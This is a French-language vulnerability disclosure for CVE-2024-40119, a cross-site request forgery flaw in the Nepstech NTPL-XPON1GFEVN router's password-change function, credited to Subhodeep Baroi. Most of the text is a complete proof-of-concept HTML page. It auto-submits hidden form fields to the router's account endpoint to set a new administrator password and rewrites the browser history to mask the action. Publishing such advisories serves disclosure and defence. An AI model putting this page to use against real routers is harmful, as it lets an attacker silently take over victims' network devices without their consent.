
Vulnérabilité de falsification de requête inter-site (CSRF) dans la fonction de changement de mot de passe, qui permet à des attaquants distants de modifier le mot de passe administrateur sans le consentement de l'utilisateur, entraînant une éventuelle prise de contrôle du compte.
Subhodeep Baroi
CVE-2024-40119 est une vulnérabilité de type Cross-Site Request Forgery (CSRF) dans le routeur Wifi Nepstech xpon NTPL-XPON1GFEVN v1.0 avec firmware v2.0.1. Cette vulnérabilité permet à des attaquants distants de modifier le mot de passe administrateur sans le consentement de l'utilisateur, conduisant à une potentielle prise de contrôle du compte.
Un attaquant distant peut créer une page HTML malveillante qui déclenche la fonctionnalité de changement de mot de passe lorsqu'elle est visitée par un utilisateur authentifié. Voici un exemple de vecteur d'attaque :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
<input type="hidden" name="name0" value="admin" />
<input type="hidden" name="name1" value="user" />
<input type="hidden" name="name2" value="user3" />
<input type="hidden" name="oldUsername" value="admin" />
<input type="hidden" name="newUsername" value="" />
<input type="hidden" name="oldPassword" value="" />
<input type="hidden" name="newPassword" value="UserUser2@" />
<input type="hidden" name="cfmPassword" value="UserUser2@" />
<input type="hidden" name="accountflg" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>